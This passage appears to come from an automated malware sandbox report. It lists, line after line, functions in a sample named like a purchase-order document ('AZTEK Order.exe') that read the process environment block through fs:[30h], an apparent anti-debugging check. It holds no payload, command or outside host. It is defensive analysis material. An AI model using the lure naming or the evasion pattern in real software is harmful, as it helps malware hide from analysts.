            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01822349 mov eax, dword ptr fs:[00000030h]6_2_01822349
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186A352 mov eax, dword ptr fs:[00000030h]6_2_0186A352
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01848350 mov ecx, dword ptr fs:[00000030h]6_2_01848350
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182035C mov eax, dword ptr fs:[00000030h]6_2_0182035C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182035C mov eax, dword ptr fs:[00000030h]6_2_0182035C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182035C mov eax, dword ptr fs:[00000030h]6_2_0182035C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182035C mov ecx, dword ptr fs:[00000030h]6_2_0182035C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182035C mov eax, dword ptr fs:[00000030h]6_2_0182035C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182035C mov eax, dword ptr fs:[00000030h]6_2_0182035C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01798397 mov eax, dword ptr fs:[00000030h]6_2_01798397
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01798397 mov eax, dword ptr fs:[00000030h]6_2_01798397
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01798397 mov eax, dword ptr fs:[00000030h]6_2_01798397
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179E388 mov eax, dword ptr fs:[00000030h]6_2_0179E388
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179E388 mov eax, dword ptr fs:[00000030h]6_2_0179E388
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179E388 mov eax, dword ptr fs:[00000030h]6_2_0179E388
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C438F mov eax, dword ptr fs:[00000030h]6_2_017C438F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C438F mov eax, dword ptr fs:[00000030h]6_2_017C438F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184437C mov eax, dword ptr fs:[00000030h]6_2_0184437C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01820283 mov eax, dword ptr fs:[00000030h]6_2_01820283
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01820283 mov eax, dword ptr fs:[00000030h]6_2_01820283
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01820283 mov eax, dword ptr fs:[00000030h]6_2_01820283
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179826B mov eax, dword ptr fs:[00000030h]6_2_0179826B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A4260 mov eax, dword ptr fs:[00000030h]6_2_017A4260
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A4260 mov eax, dword ptr fs:[00000030h]6_2_017A4260
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A4260 mov eax, dword ptr fs:[00000030h]6_2_017A4260
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018362A0 mov eax, dword ptr fs:[00000030h]6_2_018362A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018362A0 mov ecx, dword ptr fs:[00000030h]6_2_018362A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018362A0 mov eax, dword ptr fs:[00000030h]6_2_018362A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018362A0 mov eax, dword ptr fs:[00000030h]6_2_018362A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018362A0 mov eax, dword ptr fs:[00000030h]6_2_018362A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018362A0 mov eax, dword ptr fs:[00000030h]6_2_018362A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A6259 mov eax, dword ptr fs:[00000030h]6_2_017A6259
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179A250 mov eax, dword ptr fs:[00000030h]6_2_0179A250
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179823B mov eax, dword ptr fs:[00000030h]6_2_0179823B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B02E1 mov eax, dword ptr fs:[00000030h]6_2_017B02E1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B02E1 mov eax, dword ptr fs:[00000030h]6_2_017B02E1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B02E1 mov eax, dword ptr fs:[00000030h]6_2_017B02E1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA2C3 mov eax, dword ptr fs:[00000030h]6_2_017AA2C3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA2C3 mov eax, dword ptr fs:[00000030h]6_2_017AA2C3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA2C3 mov eax, dword ptr fs:[00000030h]6_2_017AA2C3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA2C3 mov eax, dword ptr fs:[00000030h]6_2_017AA2C3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA2C3 mov eax, dword ptr fs:[00000030h]6_2_017AA2C3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01828243 mov eax, dword ptr fs:[00000030h]6_2_01828243
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01828243 mov ecx, dword ptr fs:[00000030h]6_2_01828243
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185A250 mov eax, dword ptr fs:[00000030h]6_2_0185A250
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185A250 mov eax, dword ptr fs:[00000030h]6_2_0185A250
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850274 mov eax, dword ptr fs:[00000030h]6_2_01850274
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE284 mov eax, dword ptr fs:[00000030h]6_2_017DE284
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE284 mov eax, dword ptr fs:[00000030h]6_2_017DE284
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D656A mov eax, dword ptr fs:[00000030h]6_2_017D656A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D656A mov eax, dword ptr fs:[00000030h]6_2_017D656A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D656A mov eax, dword ptr fs:[00000030h]6_2_017D656A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018205A7 mov eax, dword ptr fs:[00000030h]6_2_018205A7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018205A7 mov eax, dword ptr fs:[00000030h]6_2_018205A7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018205A7 mov eax, dword ptr fs:[00000030h]6_2_018205A7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8550 mov eax, dword ptr fs:[00000030h]6_2_017A8550
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8550 mov eax, dword ptr fs:[00000030h]6_2_017A8550
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE53E mov eax, dword ptr fs:[00000030h]6_2_017CE53E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE53E mov eax, dword ptr fs:[00000030h]6_2_017CE53E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE53E mov eax, dword ptr fs:[00000030h]6_2_017CE53E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE53E mov eax, dword ptr fs:[00000030h]6_2_017CE53E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE53E mov eax, dword ptr fs:[00000030h]6_2_017CE53E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0535 mov eax, dword ptr fs:[00000030h]6_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0535 mov eax, dword ptr fs:[00000030h]6_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0535 mov eax, dword ptr fs:[00000030h]6_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0535 mov eax, dword ptr fs:[00000030h]6_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0535 mov eax, dword ptr fs:[00000030h]6_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0535 mov eax, dword ptr fs:[00000030h]6_2_017B0535
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01836500 mov eax, dword ptr fs:[00000030h]6_2_01836500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874500 mov eax, dword ptr fs:[00000030h]6_2_01874500
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC5ED mov eax, dword ptr fs:[00000030h]6_2_017DC5ED
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC5ED mov eax, dword ptr fs:[00000030h]6_2_017DC5ED
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A25E0 mov eax, dword ptr fs:[00000030h]6_2_017A25E0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE5E7 mov eax, dword ptr fs:[00000030h]6_2_017CE5E7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A65D0 mov eax, dword ptr fs:[00000030h]6_2_017A65D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA5D0 mov eax, dword ptr fs:[00000030h]6_2_017DA5D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA5D0 mov eax, dword ptr fs:[00000030h]6_2_017DA5D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE5CF mov eax, dword ptr fs:[00000030h]6_2_017DE5CF
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE5CF mov eax, dword ptr fs:[00000030h]6_2_017DE5CF
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C45B1 mov eax, dword ptr fs:[00000030h]6_2_017C45B1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C45B1 mov eax, dword ptr fs:[00000030h]6_2_017C45B1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE59C mov eax, dword ptr fs:[00000030h]6_2_017DE59C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D4588 mov eax, dword ptr fs:[00000030h]6_2_017D4588
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A2582 mov eax, dword ptr fs:[00000030h]6_2_017A2582
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A2582 mov ecx, dword ptr fs:[00000030h]6_2_017A2582
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CA470 mov eax, dword ptr fs:[00000030h]6_2_017CA470
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CA470 mov eax, dword ptr fs:[00000030h]6_2_017CA470
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CA470 mov eax, dword ptr fs:[00000030h]6_2_017CA470
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185A49A mov eax, dword ptr fs:[00000030h]6_2_0185A49A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179645D mov eax, dword ptr fs:[00000030h]6_2_0179645D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C245A mov eax, dword ptr fs:[00000030h]6_2_017C245A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182A4B0 mov eax, dword ptr fs:[00000030h]6_2_0182A4B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DE443 mov eax, dword ptr fs:[00000030h]6_2_017DE443
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA430 mov eax, dword ptr fs:[00000030h]6_2_017DA430
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179E420 mov eax, dword ptr fs:[00000030h]6_2_0179E420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179E420 mov eax, dword ptr fs:[00000030h]6_2_0179E420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179E420 mov eax, dword ptr fs:[00000030h]6_2_0179E420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179C427 mov eax, dword ptr fs:[00000030h]6_2_0179C427
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D8402 mov eax, dword ptr fs:[00000030h]6_2_017D8402
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D8402 mov eax, dword ptr fs:[00000030h]6_2_017D8402
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D8402 mov eax, dword ptr fs:[00000030h]6_2_017D8402
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A04E5 mov ecx, dword ptr fs:[00000030h]6_2_017A04E5
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01826420 mov eax, dword ptr fs:[00000030h]6_2_01826420
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D44B0 mov ecx, dword ptr fs:[00000030h]6_2_017D44B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A64AB mov eax, dword ptr fs:[00000030h]6_2_017A64AB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185A456 mov eax, dword ptr fs:[00000030h]6_2_0185A456
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182C460 mov ecx, dword ptr fs:[00000030h]6_2_0182C460
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8770 mov eax, dword ptr fs:[00000030h]6_2_017A8770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184678E mov eax, dword ptr fs:[00000030h]6_2_0184678E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0770 mov eax, dword ptr fs:[00000030h]6_2_017B0770
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018547A0 mov eax, dword ptr fs:[00000030h]6_2_018547A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A0750 mov eax, dword ptr fs:[00000030h]6_2_017A0750
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2750 mov eax, dword ptr fs:[00000030h]6_2_017E2750
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2750 mov eax, dword ptr fs:[00000030h]6_2_017E2750
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D674D mov esi, dword ptr fs:[00000030h]6_2_017D674D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D674D mov eax, dword ptr fs:[00000030h]6_2_017D674D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D674D mov eax, dword ptr fs:[00000030h]6_2_017D674D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D273C mov eax, dword ptr fs:[00000030h]6_2_017D273C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D273C mov ecx, dword ptr fs:[00000030h]6_2_017D273C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D273C mov eax, dword ptr fs:[00000030h]6_2_017D273C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018207C3 mov eax, dword ptr fs:[00000030h]6_2_018207C3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC720 mov eax, dword ptr fs:[00000030h]6_2_017DC720
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC720 mov eax, dword ptr fs:[00000030h]6_2_017DC720
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182E7E1 mov eax, dword ptr fs:[00000030h]6_2_0182E7E1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A0710 mov eax, dword ptr fs:[00000030h]6_2_017A0710
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D0710 mov eax, dword ptr fs:[00000030h]6_2_017D0710
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC700 mov eax, dword ptr fs:[00000030h]6_2_017DC700
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A47FB mov eax, dword ptr fs:[00000030h]6_2_017A47FB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A47FB mov eax, dword ptr fs:[00000030h]6_2_017A47FB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C27ED mov eax, dword ptr fs:[00000030h]6_2_017C27ED
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C27ED mov eax, dword ptr fs:[00000030h]6_2_017C27ED
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C27ED mov eax, dword ptr fs:[00000030h]6_2_017C27ED
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181C730 mov eax, dword ptr fs:[00000030h]6_2_0181C730
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AC7C0 mov eax, dword ptr fs:[00000030h]6_2_017AC7C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A07AF mov eax, dword ptr fs:[00000030h]6_2_017A07AF
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01824755 mov eax, dword ptr fs:[00000030h]6_2_01824755
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182E75D mov eax, dword ptr fs:[00000030h]6_2_0182E75D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D2674 mov eax, dword ptr fs:[00000030h]6_2_017D2674
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA660 mov eax, dword ptr fs:[00000030h]6_2_017DA660
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA660 mov eax, dword ptr fs:[00000030h]6_2_017DA660
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BC640 mov eax, dword ptr fs:[00000030h]6_2_017BC640
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A262C mov eax, dword ptr fs:[00000030h]6_2_017A262C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BE627 mov eax, dword ptr fs:[00000030h]6_2_017BE627
